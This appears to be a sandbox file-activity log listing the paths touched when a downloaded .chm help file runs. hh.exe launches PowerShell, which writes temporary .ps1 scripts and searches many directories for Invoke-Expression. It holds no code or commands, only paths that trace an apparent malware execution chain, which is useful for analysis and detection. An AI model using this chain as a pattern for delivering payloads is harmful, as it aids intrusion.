                        C:\Users\user\AppData\Local\Temp\~DFE4C0C9E922237CB3.TMP

                    
                        C:\Users\user\AppData\Local\Temp\~DF206D010F207A645D.TMP

                    
                        C:\Windows\Fonts\staticcache.dat

                    
                        C:\Windows\System32\ieframe.dll

                    
                        C:\Windows\System32\shell32.dll

                    
                        C:\Users

                    
                        C:\Users\user

                    
                        C:\Users\user\AppData

                    
                        C:\Users\user\AppData\Local

                    
                        C:\Users\user\AppData\Local\Temp\5f11baf452c0d7cbb25c.chm:Zone.Identifier

                    
                        C:\Windows\WindowsShell.manifest

                    
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\

                    
                        C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\

                    
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files

                    
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat

                    
                        C:\Users\user\AppData\Local\Microsoft\Windows\Caches

                    
                        C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db

                    
                        C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db

                    
                        \??\MountPointManager

                    
                        C:\Windows\hh.exe

                    
                        C:\Windows\Fonts\timesbd.ttf

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                    
                        C:\Windows

                    
                        C:\Windows\System32

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu

                    
                        C:\

                    
                        C:\Users\desktop.ini

                    
                        C:\Users\user\AppData\Roaming

                    
                        C:\Users\user\AppData\Roaming\Microsoft\desktop.ini

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

                    
                        C:\Users\user\Desktop\desktop.ini

                    
                        ::\

                    
                        ::\{2559A1F3-21D7-11D4-BDAF-00C04F60B9F0}

                    
                        ::\{20D04FE0-3AEA-1069-A2D8-08002B30309D}

                    
                        ::\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}

                    
                        ::\{2559A1F1-21D7-11D4-BDAF-00C04F60B9F0}

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini

                    
                        C:\ProgramData\Microsoft\Windows\Start Menu

                    
                        C:\ProgramData\Microsoft\desktop.ini

                    
                        C:\ProgramData\Microsoft\Windows

                    
                        C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini

                    
                        ::\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}

                    
                        C:\Users\user\AppData\Local\Temp\https:\java.com\help

                    
                        C:\Users\user\AppData\Local\Temp\https:\java.com\

                    
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs

                    
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini

                    
                        C:\Users\user\Desktop

                    
                        C:\Users\Public\Desktop

                    
                        C:\Users\Public

                    
                        C:\Users\Public\desktop.ini

                    
                        C:\Users\Public\Desktop\desktop.ini

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini

                    
                        C:\Windows\System32\shdocvw.dll

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                    
                        C:\Windows\SysWOW64\propsys.dll

                    
                        C:\Windows\System32\propsys.dll

                    
                        C:\Users\user\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

                    
                        C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk\desktop.ini

                    
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories

                    
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini

                    
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell

                    
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini

                    
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

                    
                        \??\PIPE\srvsvc

                    
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\

                    
                        C:\Windows\System32\windowspowershell\v1.0\powershell_ise.exe

                    
                        C:\Windows\System32\windowspowershell

                    
                        C:\Windows\System32\WindowsPowerShell

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0R21C5093AY4OZ5LY7OX.temp

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\

                    
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF22641b9.TMP

                    
                        C:\Windows\System32\mscoree.dll.local

                    
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll

                    
                        C:\Windows\Microsoft.NET\Framework64\*

                    
                        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll

                    
                        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll

                    
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe.config

                    
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config

                    
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.localgac

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll.aux

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config

                    
                        C:\Windows\assembly\pubpol155.dat

                    
                        C:\Windows\assembly\GAC\PublisherPolicy.tme

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\07ab3d7c2cf97c9425d0805952d626ee\Microsoft.PowerShell.ConsoleHost.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\07ab3d7c2cf97c9425d0805952d626ee\Microsoft.PowerShell.ConsoleHost.ni.dll.aux

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System\37a1d51f35918dd36a0d4e34cc91732e\System.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System\37a1d51f35918dd36a0d4e34cc91732e\System.ni.dll.aux

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\89bc329e8c65a9e13067c9776d925d78\System.Core.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\89bc329e8c65a9e13067c9776d925d78\System.Core.ni.dll.aux

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f0ff319e08c416452ec3900279b0f96f\System.Management.Automation.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f0ff319e08c416452ec3900279b0f96f\System.Management.Automation.ni.dll.aux

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Serialization\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Serialization.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll

                    
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SortDefault.nlp

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\System.Management.Automation.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\System.Management.Automation.resources.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\System.Management.Automation.resources.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC\System.Management.Automation.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\System.Management.Automation.resources.dll

                    
                        C:\Windows\assembly\GAC_64\System.Management.Automation.resources\3.0.0.0_en-US_31bf3856ad364e35\System.Management.Automation.resources.dll

                    
                        C:\Windows\assembly\GAC_MSIL\System.Management.Automation.resources\3.0.0.0_en-US_31bf3856ad364e35\System.Management.Automation.resources.dll

                    
                        C:\Windows\assembly\GAC\System.Management.Automation.resources\3.0.0.0_en-US_31bf3856ad364e35\System.Management.Automation.resources.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.exe

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.exe

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\Microsoft.PowerShell.ConsoleHost.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC\Microsoft.PowerShell.ConsoleHost.resources\v4.0_3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll

                    
                        C:\Windows\assembly\GAC_64\Microsoft.PowerShell.ConsoleHost.resources\3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll

                    
                        C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll

                    
                        C:\Windows\assembly\GAC\Microsoft.PowerShell.ConsoleHost.resources\3.0.0.0_en-US_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.exe

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.exe

                    
                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell

                    
                        C:\PSTranscripts\20251209\PowerShell_transcript.USERDUM-8A61A1P.o3rz6VZb.20251209170730.txt

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\dee95ca75ccebe1cc18b31dca334cd53\System.Management.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\dee95ca75ccebe1cc18b31dca334cd53\System.Management.ni.dll.aux

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\4ac88f62ef161467f8e9dd4985837e51\System.DirectoryServices.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\4ac88f62ef161467f8e9dd4985837e51\System.DirectoryServices.ni.dll.aux

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\1fb6db2ce6d2887fe6f8f620cb092343\System.Xml.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\1fb6db2ce6d2887fe6f8f620cb092343\System.Xml.ni.dll.aux

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\b5152c3c02957bbe4459505a39afde20\System.Configuration.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\b5152c3c02957bbe4459505a39afde20\System.Configuration.ni.dll.aux

                    
                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    
                        C:\Windows\System32\tzres.dll

                    
                        C:\Windows\System32\en-US\tzres.dll.mui

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\dcffb1d4b51a427f7c054b15597ef269\System.Data.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\dcffb1d4b51a427f7c054b15597ef269\System.Data.ni.dll.aux

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Caching\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Caching.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_64\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\95713da12f28e9ecca9fa0689ac9985e\Microsoft.PowerShell.Security.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\95713da12f28e9ecca9fa0689ac9985e\Microsoft.PowerShell.Security.ni.dll.aux

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\0935f5dce0a38689b9507cb1938fe436\System.Transactions.ni.dll.aux

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\61271ef982721d8c0c8162fc84735575\Microsoft.Management.Infrastructure.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\61271ef982721d8c0c8162fc84735575\Microsoft.Management.Infrastructure.ni.dll.aux

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\568282207f7c6c41d18e9e38637dbe77\System.Numerics.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\568282207f7c6c41d18e9e38637dbe77\System.Numerics.ni.dll.aux

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\*

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\badb4d0607cbbbd10c6b33a07635c05b\Microsoft.CSharp.ni.dll

                    
                        C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\badb4d0607cbbbd10c6b33a07635c05b\Microsoft.CSharp.ni.dll.aux

                    
                        C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll

                    
                        C:\Windows\System32\wldp.dll

                    
                        C:\Users\user\AppData\Local\Temp\

                    
                        C:\Users\user\AppData\Local\Temp\uyhh2amx.eph.ps1

                    
                        C:\Users\user\AppData\Local\Temp\bzfyfzsr.33n.psm1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1

                    
                        C:\Users\user\Documents\WindowsPowerShell\profile.ps1

                    
                        C:\Users\user\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                    
                        C:\PSTranscripts\20251209

                    
                        C:\PSTranscripts

                    
                        C:\Users\user\AppData\Local\Temp\%SystemRoot%\system32\WindowsPowerShell\v1.0\

                    
                        C:\Python38\Scripts\

                    
                        C:\Python38\Scripts\Invoke-Expression.*

                    
                        C:\Python38\

                    
                        C:\Python38\Invoke-Expression.*

                    
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath

                    
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath\Invoke-Expression.*

                    
                        C:\ProgramData\Boxstarter

                    
                        C:\ProgramData\Boxstarter\Invoke-Expression.*

                    
                        C:\Windows\System32\Invoke-Expression.*

                    
                        C:\Windows\Invoke-Expression.*

                    
                        C:\Windows\System32\wbem

                    
                        C:\Windows\System32\wbem\Invoke-Expression.*

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Invoke-Expression.*

                    
                        C:\ProgramData\chocolatey\bin

                    
                        C:\ProgramData\chocolatey\bin\Invoke-Expression.*

                    
                        C:\Program Files\dotnet\

                    
                        C:\Program Files\dotnet\Invoke-Expression.*

                    
                        C:\Program Files (x86)\dotnet\

                    
                        C:\Program Files (x86)\dotnet\Invoke-Expression.*

                    
                        C:\Program Files\OpenJDK\jdk-19.0.1\bin

                    
                        C:\Program Files\OpenJDK\jdk-19.0.1\bin\Invoke-Expression.*

                    
                        C:\Program Files\PowerShell\7-preview\preview

                    
                        C:\Program Files\PowerShell\7-preview\preview\Invoke-Expression.*

                    
                        C:\Users\user\Documents\WindowsPowerShell\Modules

                    
                        C:\ProgramData\Boxstarter\*

                    
                        C:\ProgramData\Boxstarter\Boxstarter.psd1

                    
                        C:\ProgramData\Boxstarter\Boxstarter.psm1

                    
                        C:\ProgramData\Boxstarter\Boxstarter.cdxml

                    
                        C:\ProgramData\Boxstarter\Boxstarter.xaml

                    
                        C:\ProgramData\Boxstarter\Boxstarter.ni.dll

                    
                        C:\ProgramData\Boxstarter\Boxstarter.dll

                    
                        C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper

                    
                        C:\ProgramData\Boxstarter\Boxstarter.Chocolatey

                    
                        C:\ProgramData\Boxstarter\Boxstarter.Common

                    
                        C:\ProgramData\Boxstarter\Boxstarter.HyperV

                    
                        C:\ProgramData\Boxstarter\Boxstarter.WinConfig

                    
                        C:\ProgramData\Boxstarter\BuildPackages

                    
                        C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\*

                    
                        C:\ProgramData\Boxstarter\Boxstarter.Bootstrapper\Boxstarter.Bootstrapper.psd1

                    
                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                    
                        C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\*

                    
                        C:\ProgramData\Boxstarter\Boxstarter.Chocolatey\Boxstarter.Chocolatey.psd1

                    
                        C:\ProgramData\Boxstarter\Boxstarter.Common\*

                    
                        C:\ProgramData\Boxstarter\Boxstarter.Common\Boxstarter.Common.psd1

                    
                        C:\ProgramData\Boxstarter\Boxstarter.HyperV\*

                    
                        C:\ProgramData\Boxstarter\Boxstarter.HyperV\Boxstarter.HyperV.psd1

                    
                        C:\ProgramData\Boxstarter\Boxstarter.WinConfig\*

                    
                        C:\ProgramData\Boxstarter\Boxstarter.WinConfig\Boxstarter.WinConfig.psd1

                    
                        C:\ProgramData\Boxstarter\BuildPackages\*

                    
                        C:\ProgramData\Boxstarter\BuildPackages\BuildPackages.psd1

                    
                        C:\ProgramData\Boxstarter\BuildPackages\BuildPackages.psm1

                    
                        C:\ProgramData\Boxstarter\BuildPackages\BuildPackages.cdxml

                    
                        C:\ProgramData\Boxstarter\BuildPackages\BuildPackages.xaml

                    
                        C:\ProgramData\Boxstarter\BuildPackages\BuildPackages.ni.dll

                    
                        C:\ProgramData\Boxstarter\BuildPackages\BuildPackages.dll

                    
                        C:\Program Files\WindowsPowerShell\Modules

                    
                        C:\Program Files\WindowsPowerShell\Modules\*

                    
                        C:\Program Files\WindowsPowerShell\Modules\Modules.psd1

                    
                        C:\Program Files\WindowsPowerShell\Modules\Modules.psm1

                    
                        C:\Program Files\WindowsPowerShell\Modules\Modules.cdxml

                    
                        C:\Program Files\WindowsPowerShell\Modules\Modules.xaml

                    
                        C:\Program Files\WindowsPowerShell\Modules\Modules.ni.dll

                    
                        C:\Program Files\WindowsPowerShell\Modules\Modules.dll

                    
                        C:\Program Files\WindowsPowerShell\Modules\PackageManagement

                    
                        C:\Program Files\WindowsPowerShell\Modules\PowerShellGet

                    
                        C:\Program Files\WindowsPowerShell\Modules\PackageManagement\*

                    
                        C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1

                    
                        C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1

                    
                        C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1

                    
                        C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml

                    
                        C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml

                    
                        C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.ni.dll

                    
                        C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll

                    
                        C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\*

                    
                        C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1

                    
                        C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1

                    
                        C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1

                    
                        C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml

                    
                        C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml

                    
                        C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.ni.dll

                    
                        C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\*

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Modules.psd1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Modules.psm1

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Modules.cdxml

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Modules.xaml

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Modules.ni.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Modules.dll

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppLocker

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\CimCmdlets

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ISE

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDiagnostics

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSScheduledJob

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack

                    
                        C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\*

                    
